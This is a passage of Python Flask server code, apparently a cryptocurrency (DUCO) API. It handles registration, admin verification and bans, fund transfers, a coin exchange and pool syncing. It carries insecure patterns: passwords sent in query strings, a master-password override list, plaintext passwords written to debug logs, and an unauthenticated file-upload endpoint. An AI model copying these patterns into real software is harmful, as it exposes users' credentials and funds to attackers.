if not captcha_data["success"]:
return _error("Incorrect captcha")
except Exception as e:
return _error("Captcha error: "+str(e))
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("You have used unallowed characters in the username")
if len(username) > 64 or len(unhashed_pass) > 128 or len(email) > 64:
return _error("Submited data is too long")
if user_exists(username):
return _error("This username is already registered")
if not validate_email(email, check_smtp=False):
return _error("You have provided an invalid e-mail address")
if email_exists(email):
return _error("This e-mail address was already used")
try:
password = hashpw(unhashed_pass, gensalt(rounds=BCRYPT_ROUNDS))
except Exception as e:
return _error("Bcrypt error: " +
str(e) + ", plase try using a different password")
try:
threading.Thread(
target=send_registration_email,
args=[username, email]).start()
created = str(now().strftime("%d/%m/%Y %H:%M:%S"))
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Users
(username, password, email, balance, created)
VALUES(?, ?, ?, ?, ?)""",
(username, password, email, 0.0, created))
conn.commit()
dbg(f"Success: registered {username} ({email})")
registrations.append(ip_addr)
return _success("Sucessfully registered a new wallet")
except Exception as e:
return _error(f"Error registering new account: {e}")
@app.route("/miners/<username>")
@cache.cached(timeout=POOL_SYNC_TIME)
def get_miners_api(username: str):
# Get all miners
try:
return _success(get_miners(username))
except:
return _error(f"No miners detected for: {username}")
@app.route("/wduco_wrap/<username>")
@limiter.limit("3 per 1 minute")
def api_wrap_duco(username: str):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = request.args.get('password', None).encode("utf-8")
amount = float(request.args.get('amount', None))
tron_address = str(request.args.get('address', None))
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("GET/wduco_wrap", username, amount, tron_address)
login_protocol = login(username, unhashed_pass)
if not login_protocol[0]:
return _error(login_protocol[1])
if amount < 50:
return _error("Minimum wrappable amount is 50 DUCO")
if username in jail or username in banlist or not is_verified(username) == "yes":
return _error("User can not wrap DUCO")
#acccheck = acc_check(tron_address, username)
# if acccheck[0]:
# jail.append(username)
# return _error(f"This address is associated with another account(s): {acccheck[1]}")
try:
altfeed = alt_check(ip_addr, username)
if altfeed[0]:
return _error(f"You're using multiple accounts: {altfeed[1]}, this is not allowed")
except Exception as e:
print(traceback.format_exc())
wrapfeedback = protocol_wrap_wduco(username, tron_address, amount)
wrapfeedback = wrapfeedback.replace("NO,", "").replace("OK,", "")
if "OK" in wrapfeedback:
return _success(wrapfeedback)
else:
return _error(wrapfeedback)
@app.route("/users/<username>")
@limiter.limit("60 per 1 minute")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_objects(username: str):
try:
try:
limit = int(request.args.get('limit', None))
except:
limit = 5
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
if username in banlist:
return _error("User banned")
# dbg("/GET/users/"+str(username))
try:
balance = get_user_data(username)
except Exception as e:
return _error(f"This user doesn't exist (users v1): {e}")
try:
miners = get_miners(username)
except Exception as e:
miners = []
try:
transactions = get_transactions(username, limit)
except Exception as e:
transactions = []
result = {
'balance': balance,
'miners': miners,
'transactions': transactions
}
return _success(result)
@app.route("/users/")
@cache.cached(timeout=60)
def user_error():
return _error("Usage: /users/<username>")
@app.route("/changepass/<username>")
@limiter.limit("1 per 1 minute")
def api_changepass(username: str):
try:
old_password = request.args.get('password', None).encode("utf-8")
new_password = request.args.get('newpassword', None).encode("utf-8")
new_password_encrypted = hashpw(
new_password, gensalt(rounds=BCRYPT_ROUNDS))
if old_password == new_password:
return _error("New password must be different")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1].encode('utf-8')
except:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1]
if (checkpw(old_password, old_password_database)
or old_password in overrides):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""UPDATE Users
set password = ?
where username = ?""",
(new_password_encrypted, username))
conn.commit()
print("Changed password of user " + username)
return _success("Your password has been changed")
else:
print("Passwords of user " + username + " don't match")
return _error("Your old password doesn't match!")
except Exception as e:
print("Error changing password: " + str(e))
return _error("Internal server error: " + str(e))
@app.route("/verify/<username>")
def api_verify(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
reason = str(request.args.get('reason', None))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
if is_verified(username) == "yes":
return _error("This user is already verified :P")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set rig_verified = ?
where username = ?""",
("Yes", username))
conn.commit()
except Exception as e:
return _error(str(e))
try:
if not reason:
threading.Thread(target=protocol_verified_mail,
args=[username, admin]).start()
else:
threading.Thread(target=protocol_loved_verified_mail,
args=[username, admin]).start()
except Exception as e:
return _error(str(e))
dbg(f"Verified {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/notverify/<username>")
def api_not_verify(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
reason = str(request.args.get("reason", ""))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set rig_verified = ?
where username = ?""",
("No", username))
conn.commit()
except Exception as e:
return _error(str(e))
try:
threading.Thread(target=protocol_unverified_mail, args=[
username, admin, reason]).start()
except Exception as e:
return _error(str(e))
dbg(f"Rejected verification of user {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/userban/<username>")
def api_ban(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
protocol_ban(username)
dbg(f"Banned user {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/user_transactions/<username>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_username(username: str):
# dbg("/GET/user_transactions/"+str(username))
try:
limit = int(request.args.get('limit', 5))
except Exception as e:
return _error(f"Invalid data: {e}")
try:
transactions = get_transactions(username, limit)
return _success(transactions)
except Exception as e:
return _error(f"Error: {e}")
@app.route("/id_transactions/<tx_id>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_id(tx_id: str):
# dbg("/GET/id_transactions/"+str(tx_id))
try:
return _success(api_tx_by_id(tx_id))
except Exception as e:
return _error(f"No transaction found: {tx_id}")
def api_tx_by_id(tx_id: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE id = ?""",
(tx_id, ))
row = datab.fetchone()
if not row:
raise Exception(f"No transaction found: {tx_id}")
return row_to_transaction(row)
@app.route("/transactions/<hash>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_hash(hash: str):
# dbg("/GET/transactions/"+str(hash))
try:
return _success(api_tx_by_hash(hash))
except Exception as e:
return _error(f"No transaction found: {hash}")
def api_tx_by_hash(hash: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE hash = ?""",
(hash, ))
row = datab.fetchone()
if not row:
raise Exception(f"No transaction found: {hash}")
return row_to_transaction(row)
@app.route("/balances/<username>")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_balance(username: str):
# dbg("/GET/balances/"+str(username))
try:
return _success(get_user_data(username))
except Exception as e:
return _error(f"This user doesn't exist: {username}")
@app.route("/balances")
@cache.cached(timeout=60)
def api_get_all_balances():
# dbg("/GET/balances")
try:
return _success(get_all_balances())
except Exception as e:
return _error(f"Error fetching balances: {e}")
@app.route("/transactions")
@cache.cached(timeout=60)
def api_get_all_transactions():
# dbg("/GET/transactions")
try:
return _success(get_all_transactions())
except Exception as e:
return _error(f"Error fetching transactions: {e}")
@app.route("/miners")
@cache.cached(timeout=60)
def api_get_all_miners():
# dbg("/GET/miners")
try:
return _success(get_all_miners())
except Exception as e:
return _error(f"Error fetching miners: {e}")
@app.route("/statistics")
@cache.cached(timeout=30)
def get_api_data():
# dbg("/GET/statistics")
data = {}
with open(API_JSON_URI, 'r') as f:
try:
data = load(f)
except:
pass
response = jsonify(data)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/ip")
def get_ip():
dbg("/GET/ip")
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
return _success(ip_addr)
@app.route("/statistics_miners")
@cache.cached(timeout=10)
def get_api_data_miners():
# dbg("/GET/statistics_miners")
all_miners = get_all_miners()
get_all_balances()
try:
to_return = {}
for user in all_miners:
count = len(all_miners[user])
try:
to_return[user] = {
"w": count,
"v": trusted[user]}
except:
continue
return _success(to_return)
except Exception as e:
return _error(str(e))
def row_to_day(day):
return {
"day_unix": day[0],
"day": day[1],
"price": day[2]
}
@app.route("/historic_prices")
@cache.cached(timeout=60)
def get_api_prices():
try:
currency = str(request.args.get('currency', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
limit = int(request.args.get('limit', 5))
allowed_currencies = ["bch", "xmg", "trx",
"nano", "justswap", "sushi", "max", "all"]
if not currency in allowed_currencies:
raise Exception("Invalid currency")
except Exception as e:
return _error(f"Invalid data: {e}")
try:
if currency == "all":
to_return = {}
for currency in allowed_currencies:
try:
with sqlconn("charts/prices.db", timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
f"""SELECT * FROM prices_{currency} ORDER BY day_unix DESC""")
data = datab.fetchall()
i = 0
to_return[currency] = []
for day in data:
to_return[currency].append(row_to_day(day))
i += 1
if i >= limit:
break
except:
pass
else:
with sqlconn("charts/prices.db", timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
f"""SELECT * FROM prices_{currency} ORDER BY day_unix DESC""")
data = datab.fetchall()
i = 0
to_return = []
for day in data:
to_return.append(row_to_day(day))
i += 1
if i >= limit:
break
return _success(to_return)
except Exception as e:
return _error(str(e))
def get_txid():
random = randint(-28110001, 28110001)
random_type = randint(0, XXHASH_TX_PROB+1)
if random_type != XXHASH_TX_PROB:
global_last_block_hash_cp = sha1(
bytes(str(random), encoding='ascii')).hexdigest()
else:
global_last_block_hash_cp = xxh64(
bytes(str(random), encoding='ascii'), seed=2811).hexdigest()
return global_last_block_hash_cp
def send_exchange_error(error, email, txid, username, amount):
try:
global_last_block_hash_cp = get_txid()
recipient = username
sender = "coinexchange"
memo = "DUCO Exchange refund"
balance = get_user_data(sender)["balance"]
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, sender))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
sender,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
except Exception as e:
print(f"Error refunding balance: {e}")
message = MIMEMultipart("alternative")
message["Subject"] = "⚠️ Error handling your DUCO exchange request"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_error.replace(
"{error}", str(error)
).replace(
"{txid}", str(txid)
).replace(
"{refund_txid}", str(global_last_block_hash_cp)
).replace(
"{user}", str(username)
).replace(
"{amount}", str(amount)
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
@app.route("/exchange_request/")
@limiter.limit("4 per 1 day")
def exchange_request():
try:
username = str(request.args.get('username', None))
unhashed_pass = request.args.get('password', None).encode('utf-8')
email = str(request.args.get('email', None))
ex_type = str(request.args.get('type', None)).upper()
amount = int(request.args.get('amount', None))
coin = str(request.args.get('coin', None)).lower()
address = str(request.args.get('address', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("EX:", username, email)
# return _error("Exchange requests on DUCO Exchange are currently disabled, use other exchange")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
if is_verified(username) != "yes":
return _error("Your account is not verified, see https://server.duinocoin.com/verify.html")
if username in banlist or username in jailedusr:
return _error("You are not elgible for the exchange (ToS violation)")
# Check email
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_mail = datab.fetchone()[2]
if not email == stored_mail:
return _error(
"This e-mail is not associated with your Duino-Coin account")
except Exception as e:
return _error("No user found: " + str(e))
# Check password
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_password = datab.fetchone()[1]
try:
if not checkpw(unhashed_pass, stored_password):
return _error("Invalid password")
except Exception as e:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("Invalid password")
except Exception as e:
return _error("No user found: " + str(e))
try:
altfeed = alt_check(ip_addr, username)
if altfeed[0]:
return _error(f"You're using multiple accounts: {altfeed[1]}, this is not allowed")
except Exception as e:
print(traceback.format_exc())
# Check the amount
if amount < 200:
return _error("Minimum exchangeable amount is 200 DUCO")
if amount > 10000:
return _error("Maximum exchangeable amount is 10000 DUCO.")
#acccheck = acc_check(address, username)
# if acccheck[0]:
# jail.append(username)
# return _error(f"This address is associated with another account(s): {acccheck[1]}")
if ex_type.upper() == "SELL":
balance = get_user_data(username)["balance"]
if amount > balance:
return _error("You don't have enough DUCO in your account ("
+ str(round(balance, 3))+")")
else:
exchange_balance = get_user_data(exchange_address["duco"])["balance"]
if amount > exchange_balance*10:
return _error("We don't have enough DUCO in our reserves. "
+ "Try again later or with a smaller amount")
# Get current exchange rates
try:
de_api = requests.get("https://github.com/revoxhere/duco-exchange/"
+ "raw/master/api/v1/rates",
data=None, headers={'Cache-Control': 'no-cache'}
).json()["result"]
except Exception as e:
return _error("Error getting exchange rates: " + str(e))
try:
exchanged_amount = round(
de_api[coin.lower()][ex_type.lower()]*amount,
len(str(de_api[coin.lower()][ex_type.lower()])))
except Exception:
return _error("That coin isn't listed")
if ex_type.upper() == "SELL":
min_amount = round(fees[coin.lower()] / de_api[coin.lower()]["sell"])
if amount < min_amount:
return _error(f"Minimum sellable amount for {(coin.upper())} is {min_amount} DUCO")
global_last_block_hash_cp = get_txid()
def _quickexchange(ex_type, username, email, amount, exchanged_amount, coin, address):
duco_txid = global_last_block_hash_cp
if coin.lower() == "bch":
tx_api = "https://blockchair.com/bitcoin-cash/transaction/"
try:
if len(str(address)) == 34:
address = str(convert.to_cash_address(address))
coin_txid = bch_key.send([(str(address),
float(exchanged_amount), 'bch')],
unspents=bch_key.get_unspents())
dbg("EX: Sent BCH", coin_txid)
except Exception as e:
print("EX: Error sending BCH", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "xmg":
tx_api = "https://magi.duinocoin.com/?search="
try:
coin_txid = requests.get(
"https://magi.duinocoin.com/transaction"
+ f"?username=revox&recipient={address}"
+ f"&password={DUCO_PASS}&amount={exchanged_amount}"
+ f"&memo=DUCO Exchange payment").json()
if "result" in coin_txid:
coin_txid = coin_txid["result"].split(",")[2]
dbg("EX: Sent XMG", coin_txid)
else:
raise Exception(coin_txid["message"])
except Exception as e:
print("EX: Error sending XMG", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "trx":
tx_api = "https://tronscan.org/#/transaction/"
try:
coin_txid = trx_key.trx.send_transaction(str(address),
float(exchanged_amount-1))["txid"]
dbg("EX: Sent TRX", coin_txid)
except Exception as e:
print("EX: Error sending TRX", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "lke":
tx_api = "https://explorer.likecoin.pro/tx/"
try:
coin_txid = likecoin_transaction(str(address), int(
exchanged_amount), "DUCO Exchange payment")
dbg("EX: Sent LKE", coin_txid)
except Exception as e:
print("EX: Error sending LKE", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "nano":
tx_api = "https://nanocrawler.cc/explorer/block/"
try:
coin_txid = nano_key.send(
str(address), float(exchanged_amount))
dbg("EX: Sent NANO", coin_txid)
except Exception as e:
print("EX: Error sending NANO", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
html = """\
<html>
<body>
<p style="font-size:18px">
Automatic exchange finished<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Sent: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
TXID: <a href='""" + str(tx_api) + str(coin_txid) + """'>"""+str(coin_txid)+"""</a><br>
DUCO TXID: <a href="https://explorer.duinocoin.com?search=""" + str(global_last_block_hash_cp) + """">"""+str(global_last_block_hash_cp)+"""</a>
</p>
</body>
</html>"""
try:
pass
#message = MIMEMultipart("alternative")
# message["Subject"] = ("✅ Auto DUCO - "
# + str(coin).upper()
# + " "
# + ex_type.upper()
# + " exchange finished")
#message["From"] = DUCO_EMAIL
#message["To"] = EXCHANGE_MAIL
#part = MIMEText(html, "html")
# message.attach(part)
#context = ssl.create_default_context()
# with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
# smtp.login(
# DUCO_EMAIL, DUCO_PASS)
# smtp.sendmail(
# DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
####
email_body = html_auto.replace(
"{user}", str(username)
).replace(
"{amount}", str(amount)
).replace(
"{tx_api}", str(tx_api)
).replace(
"{txid}", str(coin_txid)
).replace(
"{duco_tx}", str(global_last_block_hash_cp))
message = MIMEMultipart("alternative")
message["Subject"] = "✨ Your DUCO - " + \
str(coin).upper()+" exchange is done!"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
quickexchange = ["bch", "trx", "lke", "nano", "xmg", "bkc"]
if ex_type.lower() == "sell" and coin.lower() in quickexchange:
try:
threading.Thread(
target=_quickexchange,
args=[ex_type, username, email, amount, exchanged_amount, coin, address]).start()
dbg("Launched exchange thread")
except Exception as e:
return _error(f"Error lanching transaction thread: {e}")
elif ex_type.lower() == "sell":
html = """\
<html>
<body>
<p style="font-size:18px">
All checks for this user passed, exchange data:<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Send: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
</p>
</body>
</html>"""
try:
message = MIMEMultipart("alternative")
message["Subject"] = ("⚠️ Manual DUCO - "
+ str(coin).upper()
+ " "
+ ex_type.lower()
+ " request")
message["From"] = DUCO_EMAIL
message["To"] = EXCHANGE_MAIL
part = MIMEText(html, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
###
message = MIMEMultipart("alternative")
message["Subject"] = "🍒 Your DUCO Exchange sell request has been received"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_exc.replace(
"{user}", str(username)
).replace(
"{ex_type}", str(ex_type.lower())
).replace(
"{amount}", str(amount)
).replace(
"{address}", str(address)
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
elif ex_type.lower() == "buy":
###
message = MIMEMultipart("alternative")
message["Subject"] = "🔥 Finish your DUCO Exchange buy request"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_buy.replace(
"{user}", str(username)
).replace(
"{coin}", str(coin.upper())
).replace(
"{amount}", str(amount)
).replace(
"{exchanged_amount}", str(exchanged_amount)
).replace(
"{exchange_address}", str(exchange_address[coin.lower()])
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
if ex_type.lower() == "sell":
try:
recipient = "coinexchange"
memo = ("DUCO Exchange transaction "
+ "(sell for "
+ str(coin.upper())
+ ")")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
except Exception:
return _success("Error deducting balance")
return _success("Your exchange request has been successfully submited")
@app.route("/transaction/")
@limiter.limit("2 per 1 minute")
def api_transaction():
global last_transfer
global banlist
global rate_count
try:
username = str(request.args.get('username', None))
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
recipient = str(request.args.get('recipient', None))
amount = float(request.args.get('amount', None))
memo = sub(r'[^A-Za-z0-9 .-:!#_+-]+', ' ',
str(request.args.get('memo', None)))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"NO,Invalid data: {e}")
dbg(f"New TX request: {username}",
f"\n\t pwd: {unhashed_pass}",
f"\n\t amount: {amount}",
f"\n\t recipient: {recipient}",
f"\n\t memo: {memo}")
if not user_exists(username):
return _error("NO,User doesn\'t exist")
if not user_exists(recipient):
return _error("NO,Recipient doesn\'t exist")
if not username in chain_accounts:
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
# return _error("Temporarily disabled")
"""try:
if not username in chain_accounts:
if recipient in chain_accounts:
acccheck = acc_check(memo, username)
if acccheck[0]:
jail.append(username)
return _error(f"NO,This address is associated with another account(s): {acccheck[1]}")
except Exception as e:
print(traceback.format_exc())"""
if len(str(memo)) > 256:
memo = str(memo[0:253]) + "..."
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("NO,Incorrect username")
if not match(r"^[A-Za-z0-9_-]*$", recipient):
return _error("NO,Incorrect recipient")
if is_verified(username) == "no":
return _error("NO,Verify your account first")
if username in jail:
return _error("NO,BONK - go to kolka jail")
if recipient in banlist or recipient in jailedusr:
return _error("NO,Can\'t send funds to that user")
if username in banlist:
print(username, "in banlist")
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_addr_ban(ip_addr, True)
return _error("NO,User baned")
if memo == "-" or memo == "":
memo = "None"
if round(float(amount), DECIMALS) <= 0:
return _error("NO,Incorrect amount")
if username in rate_count:
if rate_count[username] >= 3:
banlist.append(username)
if username in last_transfer:
if (now() - last_transfer[username]).total_seconds() <= 30:
ip_addr = request.environ.get(
'HTTP_X_REAL_IP', request.remote_addr)
if not ip_addr in whitelist:
dbg("TX: rate limiting", username,
(now() - last_transfer[username]).total_seconds(), "s")
return _error(
"NO,Please wait some time before making a transaction")
try:
rate_count[username] += 1
except:
rate_count[username] = 1
if not unhashed_pass.decode() in overrides:
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
user = datab.fetchone()
stored_password = user[1]
stored_email = user[2]
try:
data = jwt.decode(unhashed_pass.decode("utf-8"), app.config['SECRET_KEY'], algorithms=['HS256'])
if data["email"] != stored_email:
return _error("NO,Invalid token")
except Exception as e:
try:
if not checkpw(unhashed_pass, stored_password):
return _error("NO,Invalid password")
except:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("NO,Invalid password")
except Exception as e:
print(e)
return _error("NO,No user found: " + str(e))
else:
if memo == "None":
memo = "OVERRIDE"
try:
if not username in chain_accounts:
altfeed = alt_check(ip_addr, username)
if altfeed[0]:
checked_u = altfeed[1].split(" ")[0]
if username != checked_u:
return _error(f"NO,You're using multiple accounts: {altfeed[1]}, this is not allowed")
except Exception as e:
print(traceback.format_exc())
try:
global_last_block_hash_cp = get_txid()
if str(recipient) == str(username):
return _error("NO,You\'re sending funds to yourself")
if (str(amount) == "" or float(amount) <= 0):
return _error("NO,Incorrect amount")
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(username,))
balance = float(datab.fetchone()[3])
if (float(balance) <= float(amount)):
return _error("NO,Incorrect amount")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("NO,Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
dbg(f"Success: transferred {amount} DUCO from",
f"{username} to {recipient} ({memo})")
last_transfer[username] = now()
return _success("OK,Successfully transferred funds,"
+ str(global_last_block_hash_cp))
except Exception as e:
print(e)
return _error("NO,Internal server error")
@app.route("/pool_sync/", methods=['GET', 'POST'])
@limiter.limit("10 per 1 minute")
def api_sync_proxy():
try:
if request.method == 'POST':
rewards = request.files['rewards']
filename = secure_filename(rewards.filename)
rewards.save(os.path.join("/home/debian/websites/", filename))
workers = request.files['workers']
filename = secure_filename(workers.filename)
workers.save(os.path.join("/home/debian/websites/", filename))
# dbg("Downloaded files from", request.args.get('name', None))
except Exception as e:
print(traceback.format_exc())
s = socket()
s.settimeout(15)
loginInfos = {}
syncData = {"blocks": {}}
try:
loginInfos["host"] = str(request.args.get('host', None))
loginInfos["port"] = str(request.args.get('port', None))
loginInfos["version"] = str(request.args.get('version', None))
loginInfos["identifier"] = str(request.args.get('identifier', None))
loginInfos["name"] = request.args.get('name', None)
syncData["blocks"]["blockIncrease"] = str(
request.args.get('blockIncrease', None))
